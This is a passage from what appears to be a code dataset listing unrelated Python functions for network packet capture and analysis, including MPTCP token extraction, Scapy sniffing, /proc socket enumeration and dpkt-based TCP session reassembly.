\"======================================================================\"\n\t\tprint \"Identifying MPTCP Connections....\"\n\t\tfor i in range(len(pkts)):\n\t\t\tif(MPTCP_CapableACK in pkts[i] and pkts[i][TCPOption_MP].mptcp.subtype == 0):\n\t\t\t\tcount +=1 #Count the number of distinct MPTCP connections\n\t\t\t\t\n\t\t\t\t#Compute the receiver's token\n\t\t\t\tself.key_rcv = pkts[i][TCPOption_MP].mptcp.rcv_key\n\t\t\t\tself.rcv_token, self.rcv_dsn = self.key2tokenAndDSN(self.key_rcv)\n\n\t\t\t\t#Compute the sender's token\n\t\t\t\tself.key_snd = pkts[i][TCPOption_MP].mptcp.snd_key\n\t\t\t\tself.snd_token, self.snd_dsn = self.key2tokenAndDSN(self.key_snd)\n\n\t\t\t\tprint (\"%i. New MPTCP Connection (Successful Handshake) src: %s; dest: %s; Sender's key: %s; Receiver's key: %s; Receivers Token (connectionID): %s; Sender's Token: %s\" % (count, pkts[i][IP].src, pkts[i][IP].dst, pkts[i][TCPOption_MP].mptcp.snd_key, pkts[i][TCPOption_MP].mptcp.rcv_key, self.rcv_token, self.snd_token))\n\t\tprint \"Total MPTCP Connections: %i\" % count", "def sniff_ip(time_to_sniff):\r\n ip_dict = dict()\r\n port_dict = dict()\r\n packets = sniff(timeout=time_to_sniff, filter=\"ip\")\r\n\r\n for i in packets:\r\n sport = 0\r\n src = i['IP'].src\r\n\r\n if \"TCP\" in i:\r\n sport = i['TCP'].sport\r\n\r\n elif \"UDP\" in i:\r\n sport = i['UDP'].sport\r\n\r\n if not src in ip_dict.keys():\r\n ip_dict[src] = 1\r\n\r\n else:\r\n ip_dict[src] += 1\r\n\r\n if sport:\r\n if not sport in port_dict.keys():\r\n port_dict[sport] = 1\r\n\r\n else:\r\n port_dict[sport] += 1\r\n\r\n return ip_dict, port_dict", "def handle_udp(pkt, packets, i, start_point):\r\n src_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n length = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(length)\r\n packets[i][2].append(checksum_value)\r\n\r\n return packets", "def MatchIpAddressInArpPackets(self):\n return self._get_attribute('matchIpAddressInArpPackets')", "def group_packets(self, packets):\n sessions = packets.sessions() # groups connections from X to Y as a Scapy PacketList in a dict\n # example: dict['TCP 172.217.17.102:443 > 10.7.2.60:38386'] = PacketList\n\n session_keys = list(sessions.keys()) # force copy so we can alter the dictionary at runtime\n for key in session_keys:\n reversed_key = self.reverse_dict_key(key)\n if(reversed_key != key and sessions.__contains__(reversed_key)):\n sessions[key] += sessions.pop(reversed_key)\n session_keys.remove(reversed_key)\n\n return self.sort_grouped_packets(list(sessions.values()))", "def get_connections(self, kind='inet'):\r\n # Note: in case of UNIX sockets we're only able to determine the\r\n # local bound path while the remote endpoint is not retrievable:\r\n # http://goo.gl/R3GHM\r\n inodes = {}\r\n # os.listdir() is gonna raise a lot of access denied\r\n # exceptions in case of unprivileged user; that's fine:\r\n # lsof does the same so it's unlikely that we can to better.\r\n for fd in os.listdir(\"/proc/%s/fd\" % self.pid):\r\n try:\r\n inode = os.readlink(\"/proc/%s/fd/%s\" % (self.pid, fd))\r\n except OSError:\r\n continue\r\n if inode.startswith('socket:['):\r\n # the process is using a socket\r\n inode = inode[8:][:-1]\r\n inodes[inode] = fd\r\n\r\n if not inodes:\r\n # no connections for this process\r\n return []\r\n\r\n def process(fin, family, type_):\r\n retlist = []\r\n try:\r\n f = open(fin, 'r')\r\n except IOError:\r\n # IPv6 not supported on this platform\r\n err = sys.exc_info()[1]\r\n if err.errno == errno.ENOENT and fin.endswith('6'):\r\n return []\r\n else:\r\n raise\r\n try:\r\n f.readline() # skip the first line\r\n for line in f:\r\n # IPv4 / IPv6\r\n if family in (socket.AF_INET, socket.AF_INET6):\r\n _, laddr, raddr, status, _, _, _, _, _, inode = \\\r\n line.split()[:10]\r\n if inode in inodes:\r\n laddr = self._decode_address(laddr, family)\r\n raddr = self._decode_address(raddr, family)\r\n if type_ == socket.SOCK_STREAM:\r\n status = _TCP_STATES_TABLE[status]\r\n else:\r\n status = \"\"\r\n fd = int(inodes[inode])\r\n conn = nt_connection(fd, family, type_, laddr,\r\n raddr, status)\r\n retlist.append(conn)\r\n elif family == socket.AF_UNIX:\r\n tokens = line.split()\r\n _, _, _, _, type_, _, inode = tokens[0:7]\r\n if inode in inodes:\r\n\r\n if len(tokens) == 8:\r\n path = tokens[-1]\r\n else:\r\n path = \"\"\r\n fd = int(inodes[inode])\r\n type_ = int(type_)\r\n conn = nt_connection(fd, family, type_, path,\r\n None, \"\")\r\n retlist.append(conn)\r\n else:\r\n raise ValueError(family)\r\n return retlist\r\n finally:\r\n f.close()\r\n\r\n tcp4 = (\"tcp\" , socket.AF_INET , socket.SOCK_STREAM)\r\n tcp6 = (\"tcp6\", socket.AF_INET6, socket.SOCK_STREAM)\r\n udp4 = (\"udp\" , socket.AF_INET , socket.SOCK_DGRAM)\r\n udp6 = (\"udp6\", socket.AF_INET6, socket.SOCK_DGRAM)\r\n unix = (\"unix\", socket.AF_UNIX, None)\r\n\r\n tmap = {\r\n \"all\" : (tcp4, tcp6, udp4, udp6, unix),\r\n \"tcp\" : (tcp4, tcp6),\r\n \"tcp4\" : (tcp4,),\r\n \"tcp6\" : (tcp6,),\r\n \"udp\" : (udp4, udp6),\r\n \"udp4\" : (udp4,),\r\n \"udp6\" : (udp6,),\r\n \"unix\" : (unix,),\r\n \"inet\" : (tcp4, tcp6, udp4, udp6),\r\n \"inet4\": (tcp4, udp4),\r\n \"inet6\": (tcp6, udp6),\r\n }\r\n if kind not in tmap:\r\n raise ValueError(\"invalid %r kind argument; choose between %s\"\r\n % (kind, ', '.join([repr(x) for x in tmap])))\r\n ret = []\r\n for f, family, type_ in tmap[kind]:\r\n ret += process(\"/proc/net/%s\" % f, family, type_)\r\n # raise NSP if the process disappeared on us\r\n os.stat('/proc/%s' % self.pid)\r\n return ret", "def __iter__(self) -> Iterator[packets.Packet]:\n for packet in self._packets:\n yield packet\n for pointer in self._packet_pointers:\n yield pointer.get()", "def sniff_packets(iface=None):\n if iface: # (http)\n sniff(filter=\"port 80\", prn=process_packet, iface=iface, store=False)\n # 'process_packet' is the callback\n else:\n sniff(filter=\"port 80\", prn=process_packet, store=False)\n # default interface", "def start_pcap(host, pcap_file_name, interface, pcap_args='',\n func_ip=None, tool_path=None):\n with LydianClient(_get_host_ip(host, func_ip)) as client:\n client.pcap.start_pcap(pcap_file_name, interface, pcap_args, tool_path)", "def sniff_traffic(hs, count, timeout, traffic_type, pkt_type, exp_dst, step):\n iface = hs.ports['eth1']\n step('Scapy capture started')\n if (traffic_type == \"encap\"):\n packet = hs.libs.scapy.sniff2(\"iface='{}', count={}, timeout={}, \"\n \" filter='port 4789 and (!icmp or !ip6)', \"\n \" prn=lambda x:x.show()\".format(\n iface, count, timeout), True)\n parse_packet(packet, traffic_type, pkt_type, exp_dst, step=step)\n elif (traffic_type == \"decap\"):\n packet = hs.libs.scapy.sniff2(\"iface='{}', count={}, \"\n \" timeout={}, filter='!icmp or !ip6', \"\n \" prn=lambda x:x.show()\".format(\n iface, count, timeout), True)\n parse_packet(packet, traffic_type, pkt_type, exp_dst, step=step)", "def offline_pcap_input_to_pipe(pcap=None, p=None, quick=False):\n\n tdm_cnt = 0\n\n print(\"Offline mode: Reading TDMs from PCAP/PCAPNG file and writing to pipe.\")\n pkt_list = rdpcap(pcap) # read the PCAP/PCAPNG file and return a list of packets\n\n # Parse the Packet List for TmNS Data Messages (TDMs), and write them to the binary TDM file\n print(\"Named Pipe '{0}' has been opened for writing. Waiting for Pipe Reader to connect.\".format(p))\n pipeout = open(p, 'wb')\n print(\"Connected to Named Pipe '{0}'. Writing binary TDMs into pipe.\".format(p))\n\n delta_from_current_time = time.time() - pkt_list[0].time\n\n try:\n for pkt in pkt_list:\n if pkt[UDP].dport == TDM_PORT:\n if quick is False:\n while (pkt.time + delta_from_current_time) > time.time():\n sleep(0.0001)\n pipeout.write(bytes(pkt[UDP].payload))\n tdm_cnt += 1\n print(\"\\rTDM Count: {0}\".format(tdm_cnt), end=\" \")\n pipeout.close()\n except IOError as e:\n if e.errno == errno.EPIPE:\n print(\"\\nBroken Pipe: EPIPE\")\n print(\"\")\n\n if tdm_cnt == 0:\n print(\"ZERO TmNS Data Messages found in {0}. No data written to {1}.\".format(pcap, p))\n else:\n print(\"\\nThere were {0} TmNS Data Messages written to {1}.\".format(tdm_cnt, p))", "def iterate(cls, disc, track_number):\n\n assert track_number >= 0 and track_number < len(disc.tracks)\n\n track = disc.tracks[track_number]\n\n packet_frame_size = (\n disc.audio_format.rate / cls.PACKETS_PER_SECOND)\n\n # Mock up a packet that ends at the start of index 1, so the\n # first packet generated starts at that position\n p = cls(disc, track, track_number, track.pregap_offset, 0)\n\n while True:\n # Calculate offsets of next packet\n abs_pos = p.abs_pos + p.length\n\n if abs_pos < track.pregap_offset:\n length = min(track.pregap_offset - abs_pos, packet_frame_size)\n else:\n length = min(track.length - abs_pos, packet_frame_size)\n\n assert length >= 0\n\n if length == 0:\n # Reached end of track, switch to next. Simplify this\n # code by generating a dummy packet for the next\n # iteration to work on (but don't yield it!)\n\n track_number += 1\n\n try:\n track = disc.tracks[track_number]\n except IndexError:\n # That was the last track, no more packets\n return\n\n p = cls(disc, track, track_number, 0, 0)\n\n else:\n # Generate next packet\n flags = 0\n if (track.pause_after\n and abs_pos + length == track.length\n and track_number + 1 < len(disc.tracks)):\n flags |= p.PAUSE_AFTER\n\n p = cls(disc, track, track_number, abs_pos, length, flags)\n yield p", "def IperfTCP(target_src, target_dst, dst, length, window=None):\n iperf = IperfSet(target_src, target_dst, dst)\n iperf.Start(length, None, window)\n return iperf.Results()", "def _process(self, buf, ts=None, pkt_num=None):\n\n if not buf:\n return\n self.pkt_num = pkt_num\n eth = dpkt.ethernet.Ethernet(buf)\n ip = eth.data\n tcp = ip.data\n sip = inet_to_str(ip.src)\n dip = inet_to_str(ip.dst)\n fin_flag = tcp.flags & 0x001\n ack_flag = tcp.flags & 0x010\n syn_flag = tcp.flags & 0x002\n rst_flag = tcp.flags & 0x004\n syn_unacceptable_states = [TCPState.ESTABLISHED, TCPState.FIN_WAIT_1, TCPState.FIN_WAIT_2,\n TCPState.CLOSING, TCPState.LAST_ACK]\n data_acceptable_states = [TCPState.ESTABLISHED, TCPState.CLOSE_WAIT]\n tcp_opts = dpkt.tcp.parse_opts(tcp.opts) if tcp.opts else None\n tcp_opts = tcp_opts_tuple_list_to_dict(tcp_opts) if tcp_opts else None\n num_pkt_session_pkt = len(self.sessions[self.session_count]) if self.session_count else 0\n\n # Only Window size can change in ACKs (in other words - after SYNs), nothing else like - window-scaling, or\n # MSS, or Selective-SYN can't be changed. If present in options after SYN, should be ignored in my opinion\n # https://superuser.com/questions/966212/does-the-sequence-number-of-tcp-packet-headers-wrap-around\n # TODO: seq number in coming packet is ahead of the expected one, then it should be held for processing\n\n def slide_window():\n\n if len(self.sessions[self.session_count]):\n if sip == self.sip:\n if self._s_mss != -1 and get_tcp_packet_payload_len_with_options(eth) > self._s_mss:\n return\n prev_ip = dpkt.ethernet.Ethernet(self.get_last_c_pkt()).data\n rcv_nxt = self._s_rcv_next\n win_left_end = self._s_win_left_edge\n early_pkts = self._s_early_pkts\n other_end_win_size = self._s_win_size\n current_state = self._c_state\n else:\n if self._c_mss != -1 and get_tcp_packet_payload_len_with_options(ip) > self._c_mss:\n return\n prev_ip = dpkt.ethernet.Ethernet(self.get_last_s_pkt()).data\n rcv_nxt = self._c_rcv_next\n win_left_end = self._c_win_left_edge\n early_pkts = self._c_early_pkts\n other_end_win_size = self._c_win_size\n current_state = self._s_state\n if self._print_debug_info:\n logger.debug(self.client_server_next_rcv(), tcp_pkt_debug_info(ip))\n prev_tcp = prev_ip.data\n prev_tcp_data_offset = prev_tcp.off * 4\n prev_ip_header_len = prev_ip.hl * 4\n prev_tcp_payload_len = prev_ip.len - (prev_tcp_data_offset + prev_ip_header_len)\n tcp_payload_len = get_tcp_packet_payload_len(ip)\n if (tcp_seq_number_in_window(win_left_end, tcp.seq, other_end_win_size) or\n tcp_seq_number_in_window(win_left_end,\n inc_tcp_seq_number(tcp.seq, tcp_payload_len), other_end_win_size)):\n if inc_tcp_seq_number(tcp.seq, tcp_payload_len) == rcv_nxt:\n \"\"\"\n \n Since there is no new payload sent, just store the tcp packet with empty payload.\n This is going to increase the packet count but not going to add duplicated data\n in session data, by session data here it means actual data sent (after discarding\n the retransmission) to application layer. To do that - we will empty out the payload,\n if packets has some, then add the packet to the session, else add the empty packet as it is\n to the session. This logic will easily handle the TCP connections supporting\n TCP Timestamp options describe in https://tools.ietf.org/html/rfc1323\n \n \"\"\"\n # one case is when seq number is < rcv_nxt but sender want to ack more data\n # which means it is sending the same data again but its acking more received content\n \"\"\"\n 1. packet has Data\n a. prev_packet has data\n A. header change (change cur packet and change previous packet) add to list\n B. no header change retransmission ( sum check)\n b. prev_packete has no data\n A. header change (change cur packet only) add to list\n B. no header change retransmission (change cur packet only)\n 2. packet has no data\n a. prev_packet has data\n A. header change (change previous packet only) add to list\n B. no header change (change previous packet only)\n b. prev_packet has no data\n A. header change (sum check) add to list\n B. no header change retransmission (sum check)\n \"\"\"\n if prev_tcp.sum == tcp.sum:\n cur_sum = tcp_shasum_calc(ip.src, ip.dst, ip.p, ip.data.pack())\n prev_sum = tcp_shasum_calc(prev_ip.src, prev_ip.dst, prev_ip.p, prev_ip.data.pack())\n if cur_sum == prev_sum:\n # covers 1.a.B and 2.b.B\n return\n\n empty_prev_ip = copy.deepcopy(prev_ip)\n empty_prev_tcp = empty_prev_ip.data\n empty_prev_tcp.seq = rcv_nxt\n empty_prev_ip.len -= prev_tcp_payload_len\n empty_prev_tcp.data = b\"\"\n empty_prev_ip = tcp_fix_checksum(empty_prev_ip)\n new_part_ip = copy.deepcopy(ip)\n new_part_tcp = new_part_ip.data\n new_part_tcp.data = b\"\"\n new_part_tcp.seq = rcv_nxt\n new_part_ip.len -= tcp_payload_len\n new_part_ip.sum = 0\n new_part_tcp.sum = 0\n new_part_ip = tcp_fix_checksum(new_part_ip)\n eth.data = new_part_ip\n cur_pkt = eth.pack()\n new_pkt = dpkt.ethernet.Ethernet(cur_pkt)\n new_part_ip = new_pkt.data\n new_part_tcp = new_part_ip.data\n\n \"\"\"\n Checksum comparision logic is kept to discard the straight duplicates packets\n without Timestamp Options. These kind of packet will not serve any purposes.\n If removal of these checksum comparison code blocks felt necessary, it could\n be removed -- that will add few extra retransmitted packets -- but that would\n also requrie to update the testcases built around this code blocks.\n \"\"\"\n if new_part_tcp.sum == empty_prev_tcp.sum:\n # covers 1.b.B\n # covers case 2.a.B\n if tcp_shasum_calc(ip.src, ip.dst, ip.p, ip.data.pack()) == tcp_shasum_calc(\n prev_ip.src, prev_ip.dst, prev_ip.p, empty_prev_ip.data.pack()):\n return\n \"\"\"\n needs to added to list under cases 2.a.A, 2.b.A, 1.a.A and 1.b.A\n cur_pkt is updated earlier\n \"\"\"\n if sip == self.sip:\n if inc_tcp_seq_number(self._c_rcv_next, 1) <= new_part_tcp.ack:\n self._c_rcv_next = new_part_tcp.ack\n else:\n if inc_tcp_seq_number(self._s_rcv_next, 1) <= new_part_tcp.ack:\n self._s_rcv_next = new_part_tcp.ack\n elif (current_state in data_acceptable_states and\n tcp_seq_number_in_window(tcp.seq, rcv_nxt, tcp_payload_len)):\n stale_data_len = seq_numbers_diff(tcp.seq, rcv_nxt)\n win_right_end = inc_tcp_seq_number(win_left_end, other_end_win_size)\n if tcp_seq_number_in_window(rcv_nxt, inc_tcp_seq_number(tcp.seq, tcp_payload_len),\n seq_numbers_diff(rcv_nxt, win_right_end)):\n tcp.data = tcp.data[stale_data_len:]\n else:\n allowed_payload_size = seq_numbers_diff(rcv_nxt, win_right_end)\n remaining_eth = dpkt.ethernet.Ethernet(eth.pack())\n #remaining_ip = eth.data\n #remaining_tcp = remaining_ip.data\n remaining_eth.data.data.seq = inc_tcp_seq_number(tcp.seq, stale_data_len + allowed_payload_size)\n remaining_eth.data.data.data = tcp.data[stale_data_len + allowed_payload_size:]\n remaining_eth.data.len -= stale_data_len + allowed_payload_size\n remaining_eth.data = tcp_fix_checksum(remaining_eth.data)\n #remaining_eth.data = remaining_ip\n tcp.data = tcp.data[stale_data_len: stale_data_len + allowed_payload_size]\n if self.sip == sip:\n self._s_early_pkts.append(((ts, self.pkt_num), remaining_eth.pack()))\n else:\n self._c_early_pkts.append(((ts, self.pkt_num), remaining_eth.pack()))\n tcp.sum = 0\n # ip.len -= stale_data_len\n tcp.seq = rcv_nxt\n ip.data = tcp\n ip.sum = 0\n eth.data = ip\n cur_pkt = eth.pack()\n if sip == self.sip:\n self._s_rcv_next = inc_tcp_seq_number(self._s_rcv_next,\n (ip.len - (ip.hl * 4 + tcp.off * 4)))\n else:\n self._c_rcv_next = inc_tcp_seq_number(self._c_rcv_next,\n (ip.len - (ip.hl * 4 + tcp.off * 4)))\n elif (current_state in data_acceptable_states and\n tcp_seq_number_in_window(rcv_nxt, tcp.seq, other_end_win_size)):\n # hold it for further processing\n if self.sip == sip:\n self._s_early_pkts.append(((ts, self.pkt_num), buf))\n else:\n self._c_early_pkts.append(((ts, self.pkt_num), buf))\n return\n else:\n return\n self.sessions[self.session_count].append(((ts, self.pkt_num), cur_pkt))\n # as this packet is accepted, might need to update the rwnd size and left end of rwnd\n if sip == self.sip:\n self._c_payload_size += len(eth.data.data.data)\n logger.debug(\"Client send data size: {}. Accepted data size is: {}.\"\n \" Total data sent from client is: {}\".format(\n len(tcp.data), len(eth.data.data.data), self._c_payload_size))\n self._c_prev_pkt_ind = len(self.sessions[self.session_count]) - 1\n rcv_nxt = self._s_rcv_next\n if (not tcp.ack == self._c_win_left_edge and\n tcp_seq_number_in_window(inc_tcp_seq_number(self._c_win_left_edge, 1),\n tcp.ack, self._c_win_size)):\n self._c_win_left_edge = tcp.ack\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n else:\n self._s_payload_size += len(eth.data.data.data)\n logger.debug(\"Server send data of size: {}. Accepted data size is: {}.\"\n \" Total data sent from server is: {}\".format(\n len(tcp.data), len(eth.data.data.data), self._s_payload_size))\n self._s_prev_pkt_ind = len(self.sessions[self.session_count]) - 1\n rcv_nxt = self._c_rcv_next\n # left edge is incremented by one becuase in_window function checks for inclusive seq number\n # starting at left edge but ACK tells what's the next expected seq number, which could be 1 next\n # to the end of window\n if (not tcp.ack == self._s_win_left_edge and\n tcp_seq_number_in_window(inc_tcp_seq_number(self._s_win_left_edge, 1),\n tcp.ack, self._s_win_size)):\n self._s_win_left_edge = tcp.ack\n self._s_win_size = tcp.win << self._s_win_scaling_factor\n # check if packet at the head of queue is ready to be processed\n while True:\n if len(early_pkts) == 0:\n break\n (_ts, _pkt_num), _buf = early_pkts.popleft()\n early_eth = dpkt.ethernet.Ethernet(_buf)\n early_ip = early_eth.data\n early_tcp = early_ip.data\n if tcp_seq_number_in_window(early_tcp.seq, rcv_nxt, get_tcp_packet_payload_len(early_ip)):\n # if early_tcp.seq <= rcv_nxt:\n self._process(early_eth.pack(), _ts, _pkt_num)\n else:\n early_pkts.appendleft(((_ts, _pkt_num), early_eth.pack()))\n break\n\n \"\"\"\n TCP flags:0x000 (12 bits)\n [11 10 9 8 7 6 5 4 3 2 1 0]\n - Bit 11 10 9: reserved\n - Bit 8: nonce\n - Bit 7: CWR (Congestion window reduced)\n - Bit 6: ECN-Echo (Explicit Congestion Notification)\n - Bit 5: Urgent\n - Bit 4: ACK\n - Bit 3: Push\n - Bit 2: Reset\n - Bit 1: SYN\n - Bit 0: FIN\n \"\"\"\n\n \"\"\"TCP flags for SYN [000000010111]\"\"\"\n\n prev_c_pkt = dpkt.ethernet.Ethernet(self.get_last_c_pkt()) if self.get_last_c_pkt() else None\n prev_c_tcp = prev_c_pkt.data.data if prev_c_pkt else None\n prev_s_pkt = dpkt.ethernet.Ethernet(self.get_last_s_pkt()) if self.get_last_s_pkt() else None\n prev_s_tcp = prev_s_pkt.data.data if prev_s_pkt else None\n logger.debug(tcp_pkt_debug_info(ip))\n logger.debug(tcp_pkt_options_debug_info(tcp))\n logger.debug(\"Processing packet number: {} in the current session\".format(self.pkt_num))\n if rst_flag:\n logger.info(\"Received a RESET flag, packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n if self._c_state == TCPState.CLOSED and self._s_state == TCPState.LISTENING:\n self.session_count += 1\n self.sessions[self.session_count] = [((ts, self.pkt_num), buf)]\n self._c_state = self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n return\n self._c_state = self._s_state = TCPState.CLOSED\n if self.sip == sip:\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n else:\n self._s_prev_pkt_ind = len(self.sessions[self.session_count])\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif syn_flag and (self._c_state in syn_unacceptable_states or self._s_state in syn_unacceptable_states):\n logger.info(\"Received a unacceptable SYN flag, packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n self._s_state = self._c_state = TCPState.CLOSED\n self.sessions[self.session_count].append(((ts,self.pkt_num), buf))\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif (self._c_state == TCPState.CLOSED and self._s_state == TCPState.LISTENING and\n self.sip == sip):\n if tcp.flags & 0x017 == 0x002:\n self.session_count += 1\n logger.info(\"number of sessions so far: {}\".format(self.session_count - 1))\n logger.info(\"starting a new session, pkt info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n self.sessions[self.session_count] = []\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._c_state = TCPState.SYN_SENT\n self._s_state = TCPState.SYN_RECEIVED\n self._c_seq = tcp.seq\n if tcp_opts:\n if dpkt.tcp.TCP_OPT_WSCALE in tcp_opts:\n self._c_win_scaling_factor = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_WSCALE], \"big\")\n if dpkt.tcp.TCP_OPT_MSS in tcp_opts:\n self._c_mss = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_MSS], \"big\")\n else:\n self._c_win_scaling_factor = 0\n self._c_mss = -1\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n logger.info(\"SYN flag from: {}:{}. Full TCP Flag is: {}\".format(self.sip, self.sp, hex(tcp.flags)))\n logger.info(\"TCP options in the packet: {}\".format(tcp_pkt_options_debug_info(tcp)))\n\n elif self._c_state == TCPState.SYN_SENT and self._s_state == TCPState.SYN_RECEIVED:\n logger.info(\"TCP packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n if self.sip == dip:\n exp_ack = inc_tcp_seq_number(prev_c_tcp.seq, 1)\n if not (tcp.flags & 0x017 == 0x012):\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"SYN-ACK flag is not set in the TCP flags: {} from: {}:{}\".format(hex(tcp.flags),\n self.dip, self.dp))\n return\n if tcp.ack == exp_ack:\n self._s_prev_pkt_ind = len(self.sessions[self.session_count])\n self._s_rcv_next = exp_ack\n self._s_win_left_edge = exp_ack\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n if tcp_opts:\n if dpkt.tcp.TCP_OPT_WSCALE in tcp_opts:\n self._s_win_scaling_factor = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_WSCALE], \"big\")\n if dpkt.tcp.TCP_OPT_MSS in tcp_opts:\n self._s_mss = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_MSS], \"big\")\n else:\n self._s_win_scaling_factor = 0\n self._s_mss = -1\n self._s_win_size = tcp.win << self._s_win_scaling_factor\n logger.info(\"SYN-ACK flag from: {}:{}. Full TCP flag is: {}\".format(\n self.dip, self.dp, hex(tcp.flags)))\n logger.info(\"TCP options in the packet: {}\".format(tcp_pkt_options_debug_info(tcp)))\n elif prev_s_tcp:\n exp_ack = inc_tcp_seq_number(prev_s_tcp.seq, 1)\n if tcp.flags & 0x017 == 0x010:\n if tcp.ack == exp_ack and tcp.seq == prev_s_tcp.ack:\n self._s_state = self._c_state = TCPState.ESTABLISHED\n self._c_seq = tcp.seq\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n self._c_rcv_next = exp_ack\n self._c_win_left_edge = exp_ack\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n logger.info(\"TCP handshake complete.\")\n else:\n self._s_state = self._c_state = TCPState.CLOSED\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n logger.info(\"TCP handshake was not completed.\")\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.ESTABLISHED and self._s_state == TCPState.ESTABLISHED:\n if ack_flag:\n \"\"\" if ACK flag is off drop the segment as per:\n https://tools.ietf.org/html/rfc793#page-37\n \"\"\"\n logger.debug(tcp_pkt_debug_info(ip))\n logger.debug(tcp_pkt_options_debug_info(tcp))\n num_pkt_session_pkt = len(self.sessions[self.session_count])\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received a FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self.sip == sip:\n self._c_state = TCPState.FIN_WAIT_1\n else:\n self._s_state = TCPState.FIN_WAIT_1\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.FIN_WAIT_1 and self._s_state == TCPState.ESTABLISHED:\n if ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and sip == self.dip:\n if inc_tcp_seq_number(prev_c_tcp.seq, max(get_tcp_packet_payload_len(prev_c_pkt), 1)) == tcp.ack:\n logger.info(\"Received a ACK for FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.FIN_WAIT_2\n self._s_state = TCPState.CLOSE_WAIT\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n if fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self._c_state == TCPState.FIN_WAIT_1:\n self._s_state = self._c_state = TCPState.CLOSING\n else:\n self._s_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._s_state == TCPState.FIN_WAIT_1 and self._c_state == TCPState.ESTABLISHED:\n if ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and sip == self.sip:\n if inc_tcp_seq_number(prev_s_tcp.seq, max(get_tcp_packet_payload_len(prev_s_pkt), 1)) == tcp.ack:\n logger.info(\"Received a ACK for FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.FIN_WAIT_2\n self._c_state = TCPState.CLOSE_WAIT\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n if fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self._s_state == TCPState.FIN_WAIT_1:\n self._s_state = self._c_state = TCPState.CLOSING\n else:\n self._c_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.FIN_WAIT_2:\n if sip == self.sip:\n if ack_flag:\n slide_window()\n if self._s_state == TCPState.LAST_ACK:\n if (num_pkt_session_pkt < len(self.sessions[self.session_count]) and\n inc_tcp_seq_number(prev_s_tcp.seq,\n max(get_tcp_packet_payload_len(prev_s_pkt), 1)) == tcp.ack):\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if self._s_state == TCPState.CLOSE_WAIT and ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._s_state == TCPState.FIN_WAIT_2:\n if sip == self.dip:\n if ack_flag:\n slide_window()\n if (self._c_state == TCPState.LAST_ACK and\n num_pkt_session_pkt < len(self.sessions[self.session_count]) and\n inc_tcp_seq_number(prev_c_tcp.seq,\n max(get_tcp_packet_payload_len(prev_c_pkt), 1)) == tcp.ack):\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if self._c_state == TCPState.CLOSE_WAIT and ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.CLOSING or 